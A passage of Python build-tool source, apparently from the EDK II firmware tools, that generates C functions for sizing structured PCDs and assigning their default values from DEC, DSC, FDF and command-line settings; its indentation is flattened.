Value = Value >> 8
Result = Result + '"'
return Result
def GenerateSizeFunction(self, Pcd):
CApp = "// Default Value in Dec \n"
CApp = CApp + "void Cal_%s_%s_Size(UINT32 *Size){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
if Pcd.IsArray() and Pcd.Capacity[-1] != "-1":
CApp += " *Size = (sizeof (%s) > *Size ? sizeof (%s) : *Size);\n" % (Pcd.DatumType,Pcd.DatumType)
else:
if "{CODE(" in Pcd.DefaultValueFromDec:
CApp += " *Size = (sizeof (%s_%s_INIT_Value) > *Size ? sizeof (%s_%s_INIT_Value) : *Size);\n" % (Pcd.TokenSpaceGuidCName,Pcd.TokenCName,Pcd.TokenSpaceGuidCName,Pcd.TokenCName)
if Pcd.Type in PCD_DYNAMIC_TYPE_SET | PCD_DYNAMIC_EX_TYPE_SET:
for skuname in Pcd.SkuInfoList:
skuobj = Pcd.SkuInfoList[skuname]
if skuobj.VariableName:
for defaultstore in skuobj.DefaultStoreDict:
pcddef = self.GetPcdDscRawDefaultValue(Pcd,skuname,defaultstore)
if pcddef:
if "{CODE(" in pcddef:
CApp += " *Size = (sizeof (%s_%s_%s_%s_Value) > *Size ? sizeof (%s_%s_%s_%s_Value) : *Size);\n" % (Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,defaultstore,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,defaultstore)
else:
CApp += " *Size = %s > *Size ? %s : *Size;\n" % (self.GetStructurePcdMaxSize(Pcd),self.GetStructurePcdMaxSize(Pcd))
else:
pcddef = self.GetPcdDscRawDefaultValue(Pcd,skuname,TAB_DEFAULT_STORES_DEFAULT)
if pcddef:
if "{CODE(" in pcddef:
CApp += " *Size = (sizeof (%s_%s_%s_%s_Value) > *Size ? sizeof (%s_%s_%s_%s_Value) : *Size);\n" % (Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,TAB_DEFAULT_STORES_DEFAULT,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,skuname,TAB_DEFAULT_STORES_DEFAULT)
else:
CApp += " *Size = %s > *Size ? %s : *Size;\n" % (self.GetStructurePcdMaxSize(Pcd),self.GetStructurePcdMaxSize(Pcd))
else:
pcddef = self.GetPcdDscRawDefaultValue(Pcd,TAB_DEFAULT,TAB_DEFAULT_STORES_DEFAULT)
if pcddef:
if "{CODE(" in pcddef:
CApp += " *Size = (sizeof (%s_%s_%s_%s_Value) > *Size ? sizeof (%s_%s_%s_%s_Value) : *Size);\n" % (Pcd.TokenSpaceGuidCName,Pcd.TokenCName,TAB_DEFAULT,TAB_DEFAULT_STORES_DEFAULT,Pcd.TokenSpaceGuidCName,Pcd.TokenCName,TAB_DEFAULT,TAB_DEFAULT_STORES_DEFAULT)
else:
CApp += " *Size = %s > *Size ? %s : *Size;\n" % (self.GetStructurePcdMaxSize(Pcd),self.GetStructurePcdMaxSize(Pcd))
ActualCap = []
for index in Pcd.DefaultValues:
if index:
ActualCap.append(index)
FieldList = Pcd.DefaultValues[index]
if not FieldList:
continue
for FieldName in FieldList:
FieldName = "." + FieldName
IsArray = _IsFieldValueAnArray(FieldList[FieldName.strip(".")][0])
if IsArray and not (FieldList[FieldName.strip(".")][0].startswith('{GUID') and FieldList[FieldName.strip(".")][0].endswith('}')):
try:
Value = ValueExpressionEx(FieldList[FieldName.strip(".")][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName.strip('.'))), FieldList[FieldName.strip(".")][1], FieldList[FieldName.strip(".")][2]))
Value, ValueSize = ParseFieldValue(Value)
if not Pcd.IsArray():
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d / __ARRAY_ELEMENT_SIZE(%s, %s) + ((%d %% __ARRAY_ELEMENT_SIZE(%s, %s)) ? 1 : 0)); // From %s Line %d Value %s \n' % (Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), FieldList[FieldName.strip(".")][1], FieldList[FieldName.strip(".")][2], FieldList[FieldName.strip(".")][0]);
else:
NewFieldName = ''
FieldName_ori = FieldName.strip('.')
while '[' in FieldName:
NewFieldName = NewFieldName + FieldName.split('[', 1)[0] + '[0]'
Array_Index = int(FieldName.split('[', 1)[1].split(']', 1)[0])
FieldName = FieldName.split(']', 1)[1]
FieldName = NewFieldName + FieldName
while '[' in FieldName and not Pcd.IsArray():
FieldName = FieldName.rsplit('[', 1)[0]
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d); // From %s Line %d Value %s\n' % (Pcd.DatumType, FieldName.strip("."), Array_Index + 1, FieldList[FieldName_ori][1], FieldList[FieldName_ori][2], FieldList[FieldName_ori][0])
for skuname in Pcd.SkuOverrideValues:
if skuname == TAB_COMMON:
continue
for defaultstorenameitem in Pcd.SkuOverrideValues[skuname]:
CApp = CApp + "// SkuName: %s, DefaultStoreName: %s \n" % (skuname, defaultstorenameitem)
for index in Pcd.SkuOverrideValues[skuname][defaultstorenameitem]:
if index:
ActualCap.append(index)
for FieldList in [Pcd.SkuOverrideValues[skuname][defaultstorenameitem][index]]:
if not FieldList:
continue
for FieldName in FieldList:
FieldName = "." + FieldName
IsArray = _IsFieldValueAnArray(FieldList[FieldName.strip(".")][0])
if IsArray and not (FieldList[FieldName.strip(".")][0].startswith('{GUID') and FieldList[FieldName.strip(".")][0].endswith('}')):
try:
Value = ValueExpressionEx(FieldList[FieldName.strip(".")][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName.strip('.'))), FieldList[FieldName.strip(".")][1], FieldList[FieldName.strip(".")][2]))
Value, ValueSize = ParseFieldValue(Value)
if not Pcd.IsArray():
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d / __ARRAY_ELEMENT_SIZE(%s, %s) + ((%d %% __ARRAY_ELEMENT_SIZE(%s, %s)) ? 1 : 0)); // From %s Line %d Value %s\n' % (Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), FieldList[FieldName.strip(".")][1], FieldList[FieldName.strip(".")][2], FieldList[FieldName.strip(".")][0]);
else:
NewFieldName = ''
FieldName_ori = FieldName.strip('.')
while '[' in FieldName:
NewFieldName = NewFieldName + FieldName.split('[', 1)[0] + '[0]'
Array_Index = int(FieldName.split('[', 1)[1].split(']', 1)[0])
FieldName = FieldName.split(']', 1)[1]
FieldName = NewFieldName + FieldName
while '[' in FieldName and not Pcd.IsArray():
FieldName = FieldName.rsplit('[', 1)[0]
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d); // From %s Line %d Value %s \n' % (Pcd.DatumType, FieldName.strip("."), Array_Index + 1, FieldList[FieldName_ori][1], FieldList[FieldName_ori][2], FieldList[FieldName_ori][0])
if Pcd.PcdFieldValueFromFdf:
CApp = CApp + "// From fdf \n"
for FieldName in Pcd.PcdFieldValueFromFdf:
FieldName = "." + FieldName
IsArray = _IsFieldValueAnArray(Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0])
if IsArray and not (Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0].startswith('{GUID') and Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0].endswith('}')):
try:
Value = ValueExpressionEx(Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName.strip('.'))), Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][1], Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][2]))
Value, ValueSize = ParseFieldValue(Value)
if not Pcd.IsArray():
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d / __ARRAY_ELEMENT_SIZE(%s, %s) + ((%d %% __ARRAY_ELEMENT_SIZE(%s, %s)) ? 1 : 0)); // From %s Line %d Value %s\n' % (Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][1], Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][2], Pcd.PcdFieldValueFromFdf[FieldName.strip(".")][0]);
else:
NewFieldName = ''
FieldName_ori = FieldName.strip('.')
while '[' in FieldName:
NewFieldName = NewFieldName + FieldName.split('[', 1)[0] + '[0]'
Array_Index = int(FieldName.split('[', 1)[1].split(']', 1)[0])
FieldName = FieldName.split(']', 1)[1]
FieldName = NewFieldName + FieldName
while '[' in FieldName:
FieldName = FieldName.rsplit('[', 1)[0]
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d); // From %s Line %s Value %s \n' % (Pcd.DatumType, FieldName.strip("."), Array_Index + 1, Pcd.PcdFieldValueFromFdf[FieldName_ori][1], Pcd.PcdFieldValueFromFdf[FieldName_ori][2], Pcd.PcdFieldValueFromFdf[FieldName_ori][0])
if Pcd.PcdFieldValueFromComm:
CApp = CApp + "// From Command Line \n"
for FieldName in Pcd.PcdFieldValueFromComm:
FieldName = "." + FieldName
IsArray = _IsFieldValueAnArray(Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0])
if IsArray and not (Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0].startswith('{GUID') and Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0].endswith('}')):
try:
Value = ValueExpressionEx(Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName.strip('.'))), Pcd.PcdFieldValueFromComm[FieldName.strip(".")][1], Pcd.PcdFieldValueFromComm[FieldName.strip(".")][2]))
Value, ValueSize = ParseFieldValue(Value)
if not Pcd.IsArray():
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d / __ARRAY_ELEMENT_SIZE(%s, %s) + ((%d %% __ARRAY_ELEMENT_SIZE(%s, %s)) ? 1 : 0)); // From %s Line %d Value %s\n' % (Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), ValueSize, Pcd.DatumType, FieldName.strip("."), Pcd.PcdFieldValueFromComm[FieldName.strip(".")][1], Pcd.PcdFieldValueFromComm[FieldName.strip(".")][2], Pcd.PcdFieldValueFromComm[FieldName.strip(".")][0]);
else:
NewFieldName = ''
FieldName_ori = FieldName.strip('.')
while '[' in FieldName:
NewFieldName = NewFieldName + FieldName.split('[', 1)[0] + '[0]'
Array_Index = int(FieldName.split('[', 1)[1].split(']', 1)[0])
FieldName = FieldName.split(']', 1)[1]
FieldName = NewFieldName + FieldName
while '[' in FieldName and not Pcd.IsArray():
FieldName = FieldName.rsplit('[', 1)[0]
CApp = CApp + ' __FLEXIBLE_SIZE(*Size, %s, %s, %d); // From %s Line %d Value %s \n' % (Pcd.DatumType, FieldName.strip("."), Array_Index + 1, Pcd.PcdFieldValueFromComm[FieldName_ori][1], Pcd.PcdFieldValueFromComm[FieldName_ori][2], Pcd.PcdFieldValueFromComm[FieldName_ori][0])
if Pcd.GetPcdMaxSize():
CApp = CApp + " *Size = (%d > *Size ? %d : *Size); // The Pcd maxsize is %d \n" % (Pcd.GetPcdMaxSize(), Pcd.GetPcdMaxSize(), Pcd.GetPcdMaxSize())
ArraySizeByAssign = self.CalculateActualCap(ActualCap)
if ArraySizeByAssign > 1:
CApp = CApp + " *Size = (%d > *Size ? %d : *Size); \n" % (ArraySizeByAssign, ArraySizeByAssign)
CApp = CApp + "}\n"
return CApp
def CalculateActualCap(self,ActualCap):
if not ActualCap:
return 1
maxsize = 1
for item in ActualCap:
index_elements = ArrayIndex.findall(item)
rt = 1
for index_e in index_elements:
index_num = index_e.lstrip("[").rstrip("]").strip()
if not index_num:
# Not support flexiable pcd array assignment
return 1
index_num = int(index_num,16) if index_num.startswith(("0x","0X")) else int(index_num)
rt = rt * (index_num+1)
if rt >maxsize:
maxsize = rt
return maxsize
@staticmethod
def GenerateSizeStatments(Pcd,skuname,defaultstorename):
if Pcd.IsArray():
r_datatype = [Pcd.BaseDatumType]
lastoneisEmpty = False
for dem in Pcd.Capacity:
if lastoneisEmpty:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName))))
if dem == '0' or dem == "-1":
r_datatype.append("[1]")
lastoneisEmpty = True
else:
r_datatype.append("[" + dem + "]")
if Pcd.Type in [MODEL_PCD_DYNAMIC_EX_HII, MODEL_PCD_DYNAMIC_HII]:
PcdDefValue = Pcd.SkuInfoList.get(skuname).DefaultStoreDict.get(defaultstorename)
elif Pcd.Type in [MODEL_PCD_DYNAMIC_EX_DEFAULT,MODEL_PCD_DYNAMIC_VPD,MODEL_PCD_DYNAMIC_DEFAULT,MODEL_PCD_DYNAMIC_EX_VPD]:
PcdDefValue = Pcd.SkuInfoList.get(skuname).DefaultValue
else:
PcdDefValue = Pcd.DefaultValue
if lastoneisEmpty:
if "{CODE(" not in PcdDefValue:
sizebasevalue_plus = "(%s / sizeof(%s) + 1)" % ((DscBuildData.GetStructurePcdMaxSize(Pcd), Pcd.BaseDatumType))
sizebasevalue = "(%s / sizeof(%s))" % ((DscBuildData.GetStructurePcdMaxSize(Pcd), Pcd.BaseDatumType))
sizeof = "sizeof(%s)" % Pcd.BaseDatumType
CApp = ' int ArraySize = %s %% %s ? %s : %s ;\n' % ( (DscBuildData.GetStructurePcdMaxSize(Pcd), sizeof, sizebasevalue_plus, sizebasevalue))
CApp += ' Size = ArraySize * sizeof(%s); \n' % Pcd.BaseDatumType
else:
CApp = " Size = 0;\n"
else:
CApp = ' Size = sizeof(%s);\n' % ("".join(r_datatype) )
else:
CApp = ' Size = sizeof(%s);\n' % (Pcd.DatumType)
CApp = CApp + ' Cal_%s_%s_Size(&Size);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
return CApp
def GetIndicator(self,index,FieldName,Pcd):
def cleanupindex(indexstr):
return indexstr.strip("[").strip("]").strip()
index_elements = ArrayIndex.findall(index)
pcd_capacity = Pcd.Capacity
if index:
indicator = "(Pcd"
if len(pcd_capacity)>2:
for i in range(0,len(index_elements)):
index_ele = index_elements[i]
index_num = index_ele.strip("[").strip("]").strip()
if i == len(index_elements) -2:
indicator += "+ %d*Size/sizeof(%s)/%d + %s)" %(int(cleanupindex(index_elements[i+1])),Pcd.BaseDatumType,reduce(lambda x,y: int(x)*int(y),pcd_capacity[:-1]), cleanupindex(index_elements[i]))
break
else:
indicator += " + %d*%s*Size/sizeof(%s)/%d" %(int(cleanupindex(index_elements[i])),reduce(lambda x,y: int(x)*int(y),pcd_capacity[i+1:-1]),Pcd.BaseDatumType,reduce(lambda x,y: int(x)*int(y),pcd_capacity[:-1]))
elif len(pcd_capacity) == 2:
indicator += "+ %d*Size/sizeof(%s)/%d + %s)" %(int(cleanupindex(index_elements[0])),Pcd.BaseDatumType,int(pcd_capacity[0]), index_elements[1].strip("[").strip("]").strip())
elif len(pcd_capacity) == 1:
index_ele = index_elements[0]
index_num = index_ele.strip("[").strip("]").strip()
indicator += " + %s)" % (index_num)
else:
indicator = "Pcd"
if FieldName:
indicator += "->" + FieldName
return indicator
def GetStarNum(self,Pcd):
if not Pcd.IsArray():
return 1
elif Pcd.IsSimpleTypeArray():
return len(Pcd.Capacity)
else:
return len(Pcd.Capacity) + 1
def GenerateDefaultValueAssignFunction(self, Pcd):
CApp = "// Default value in Dec \n"
CApp = CApp + "void Assign_%s_%s_Default_Value(%s *Pcd){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, Pcd.BaseDatumType)
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
CApp = CApp + ' UINT32 PcdArraySize;\n'
DefaultValueFromDec = Pcd.DefaultValueFromDec
IsArray = _IsFieldValueAnArray(Pcd.DefaultValueFromDec)
if IsArray:
try:
DefaultValueFromDec = ValueExpressionEx(Pcd.DefaultValueFromDec, TAB_VOID)(True)
except BadExpression:
EdkLogger.error("Build", FORMAT_INVALID, "Invalid value format for %s.%s, from DEC: %s" %
(Pcd.TokenSpaceGuidCName, Pcd.TokenCName, DefaultValueFromDec))
DefaultValueFromDec = StringToArray(DefaultValueFromDec)
Value, ValueSize = ParseFieldValue (DefaultValueFromDec)
if IsArray:
#
# Use memcpy() to copy value into field
#
if Pcd.IsArray():
pcdarraysize = Pcd.PcdArraySize()
if "{CODE(" in Pcd.DefaultValueFromDec:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_INIT_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dec exceed the array capability %s"); // From %s Line %s \n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,Pcd.DefaultValueFromDecInfo[0],Pcd.DefaultValueFromDecInfo[1])
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_INIT_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
CApp = CApp + ' memcpy (Pcd, %s_%s_INIT_Value,PcdArraySize);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
else:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(%d < %d * sizeof(%s), "Pcd %s.%s Value in Dec exceed the array capability %s"); // From %s Line %s \n' % (ValueSize,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,Pcd.DefaultValueFromDecInfo[0],Pcd.DefaultValueFromDecInfo[1])
CApp = CApp + ' PcdArraySize = %d;\n' % ValueSize
CApp = CApp + ' Value = %s; // From DEC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DefaultValueFromDec)
CApp = CApp + ' memcpy (Pcd, Value, PcdArraySize);\n'
else:
if "{CODE(" in Pcd.DefaultValueFromDec:
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_INIT_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
CApp = CApp + ' memcpy (Pcd, &%s_%s_INIT_Value,PcdArraySize);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
else:
CApp = CApp + ' Value = %s; // From DEC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DefaultValueFromDec)
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
elif isinstance(Value, str):
CApp = CApp + ' Pcd = %s; // From DEC Default Value %s\n' % (Value, Pcd.DefaultValueFromDec)
for index in Pcd.DefaultValues:
FieldList = Pcd.DefaultValues[index]
if not FieldList:
continue
for FieldName in FieldList:
IsArray = _IsFieldValueAnArray(FieldList[FieldName][0])
if IsArray:
try:
FieldList[FieldName][0] = ValueExpressionEx(FieldList[FieldName][0], TAB_VOID, self._GuidDict)(True)
except BadExpression:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " %
(".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
try:
Value, ValueSize = ParseFieldValue (FieldList[FieldName][0])
except Exception:
EdkLogger.error('Build', FORMAT_INVALID, "Invalid value format for %s. From %s Line %d " % (".".join((Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldName)), FieldList[FieldName][1], FieldList[FieldName][2]))
indicator = self.GetIndicator(index, FieldName,Pcd)
if IsArray:
#
# Use memcpy() to copy value into field
#
CApp = CApp + ' FieldSize = __FIELD_SIZE(%s, %s);\n' % (Pcd.BaseDatumType, FieldName)
CApp = CApp + ' Value = %s; // From %s Line %d Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' __STATIC_ASSERT((__FIELD_SIZE(%s, %s) >= %d) || (__FIELD_SIZE(%s, %s) == 0), "Input buffer exceeds the buffer array"); // From %s Line %d Value %s\n' % (Pcd.BaseDatumType, FieldName, ValueSize, Pcd.BaseDatumType, FieldName, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + ' memcpy (&%s, Value, (FieldSize > 0 && FieldSize < %d) ? FieldSize : %d);\n' % (indicator, ValueSize, ValueSize)
elif isinstance(Value, str):
CApp = CApp + ' %s = %s; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
if '[' in FieldName and ']' in FieldName:
Index = int(FieldName.split('[')[1].split(']')[0])
CApp = CApp + ' __STATIC_ASSERT((%d < __ARRAY_SIZE(Pcd->%s)) || (__ARRAY_SIZE(Pcd->%s) == 0), "array index exceeds the array number"); // From %s Line %d Index of %s\n' % (Index, FieldName.split('[')[0], FieldName.split('[')[0], FieldList[FieldName][1], FieldList[FieldName][2], FieldName)
if ValueSize > 4:
CApp = CApp + ' %s = %dULL; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
else:
CApp = CApp + ' %s = %d; // From %s Line %d Value %s\n' % (indicator, Value, FieldList[FieldName][1], FieldList[FieldName][2], FieldList[FieldName][0])
CApp = CApp + "}\n"
return CApp
@staticmethod
def GenerateDefaultValueAssignStatement(Pcd):
CApp = ' Assign_%s_%s_Default_Value(Pcd);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName)
return CApp
def GetPcdDscRawDefaultValue(self,Pcd, SkuName,DefaultStoreName):
if Pcd.Type in PCD_DYNAMIC_TYPE_SET or Pcd.Type in PCD_DYNAMIC_EX_TYPE_SET:
if (SkuName, DefaultStoreName) == (TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT):
pcddefaultvalue = Pcd.DefaultFromDSC.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT) if Pcd.DefaultFromDSC else None
else:
pcddefaultvalue = Pcd.DscRawValue.get(SkuName, {}).get(DefaultStoreName)
else:
pcddefaultvalue = Pcd.DscRawValue.get(SkuName, {}).get(TAB_DEFAULT_STORES_DEFAULT)
return pcddefaultvalue
def GetPcdDscRawValueInfo(self,Pcd, SkuName,DefaultStoreName):
DscValueInfo = Pcd.DscRawValueInfo.get(SkuName, {}).get(DefaultStoreName)
if DscValueInfo:
dscfilepath,lineno = DscValueInfo
else:
dscfilepath = self.MetaFile.File
lineno = ""
return dscfilepath,lineno
def GenerateInitValueFunction(self, Pcd, SkuName, DefaultStoreName):
CApp = "// Value in Dsc for Sku: %s, DefaultStore %s\n" % (SkuName, DefaultStoreName)
CApp = CApp + "void Assign_%s_%s_%s_%s_Value(%s *Pcd){\n" % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName, SkuName, DefaultStoreName, Pcd.BaseDatumType)
CApp = CApp + ' UINT32 FieldSize;\n'
CApp = CApp + ' CHAR8 *Value;\n'
CApp = CApp + ' UINT32 PcdArraySize;\n'
CApp = CApp + "// SkuName: %s, DefaultStoreName: %s \n" % (TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT)
inherit_OverrideValues = Pcd.SkuOverrideValues[SkuName]
dscfilepath,lineno = self.GetPcdDscRawValueInfo(Pcd, SkuName, DefaultStoreName)
if lineno:
valuefrom = "%s Line %s" % (dscfilepath,str(lineno))
else:
valuefrom = dscfilepath
pcddefaultvalue = self.GetPcdDscRawDefaultValue(Pcd, SkuName, DefaultStoreName)
if pcddefaultvalue:
FieldList = pcddefaultvalue
IsArray = _IsFieldValueAnArray(FieldList)
if IsArray:
if "{CODE(" not in FieldList:
try:
FieldList = ValueExpressionEx(FieldList, TAB_VOID)(True)
except BadExpression:
EdkLogger.error("Build", FORMAT_INVALID, "Invalid value format for %s.%s, from DSC: %s" %
(Pcd.TokenSpaceGuidCName, Pcd.TokenCName, FieldList))
Value, ValueSize = ParseFieldValue (FieldList)
if (SkuName, DefaultStoreName) == (TAB_DEFAULT, TAB_DEFAULT_STORES_DEFAULT):
if isinstance(Value, str):
if "{CODE(" in Value:
if Pcd.IsArray() and Pcd.Capacity[-1] != "-1":
pcdarraysize = Pcd.PcdArraySize()
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_%s_%s_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType, valuefrom)
CApp = CApp+ ' PcdArraySize = sizeof(%s_%s_%s_%s_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
CApp = CApp + ' memcpy (Pcd, &%s_%s_%s_%s_Value,PcdArraySize);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
CApp = CApp + ' Pcd = %s; // From DSC Default Value %s\n' % (Value, Pcd.DefaultFromDSC.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT, Pcd.DefaultValue) if Pcd.DefaultFromDSC else Pcd.DefaultValue)
elif IsArray:
#
# Use memcpy() to copy value into field
#
if Pcd.IsArray():
pcdarraysize = Pcd.PcdArraySize()
if "{CODE(" in pcddefaultvalue:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_%s_%s_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_%s_%s_Value);\n ' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
CApp = CApp + ' memcpy (Pcd, %s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
if Pcd.Capacity[-1] != "-1":
CApp = CApp + '__STATIC_ASSERT(%d < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (ValueSize,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = %d;\n' % ValueSize
CApp = CApp + ' Value = %s; // From DSC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DefaultFromDSC.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT, Pcd.DefaultValue) if Pcd.DefaultFromDSC else Pcd.DefaultValue)
CApp = CApp + ' memcpy (Pcd, Value, PcdArraySize);\n'
else:
if "{CODE(" in pcddefaultvalue:
CApp = CApp + ' PcdArraySize = %d < sizeof(%s) * %d ? %d: sizeof(%s) * %d;\n ' % (ValueSize,Pcd.BaseDatumType,pcdarraysize,ValueSize,Pcd.BaseDatumType,pcdarraysize)
CApp = CApp + ' memcpy (Pcd, &%s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
CApp = CApp + ' Value = %s; // From DSC Default Value %s\n' % (DscBuildData.IntToCString(Value, ValueSize), Pcd.DefaultFromDSC.get(TAB_DEFAULT, {}).get(TAB_DEFAULT_STORES_DEFAULT, Pcd.DefaultValue) if Pcd.DefaultFromDSC else Pcd.DefaultValue)
CApp = CApp + ' memcpy (Pcd, Value, %d);\n' % (ValueSize)
else:
if isinstance(Value, str):
if "{CODE(" in Value:
if Pcd.IsArray() and Pcd.Capacity[-1] != "-1":
pcdarraysize = Pcd.PcdArraySize()
CApp = CApp + '__STATIC_ASSERT(sizeof(%s_%s_%s_%s_Value) < %d * sizeof(%s), "Pcd %s.%s Value in Dsc exceed the array capability %s"); // From %s \n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName,pcdarraysize,Pcd.BaseDatumType,Pcd.TokenSpaceGuidCName, Pcd.TokenCName,Pcd.DatumType,valuefrom)
CApp = CApp + ' PcdArraySize = sizeof(%s_%s_%s_%s_Value);\n '% (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
CApp = CApp + ' memcpy (Pcd, &%s_%s_%s_%s_Value, PcdArraySize);\n' % (Pcd.TokenSpaceGuidCName, Pcd.TokenCName,SkuName, DefaultStoreName)
else:
CApp = CApp + ' Pcd = %s; // From DSC Default Value %s\n' % (Value, Pcd.DscRawValue.get(SkuName, {}).get(DefaultStoreName))
elif IsArray:
#
# Use memcpy() to copy value into field
#
if Pcd.IsArray():
pcdarraysize = Pcd.PcdArraySize()
if "{CODE(" in pcddefaultvalue:
if Pcd.Capacity[-1] != "-1":
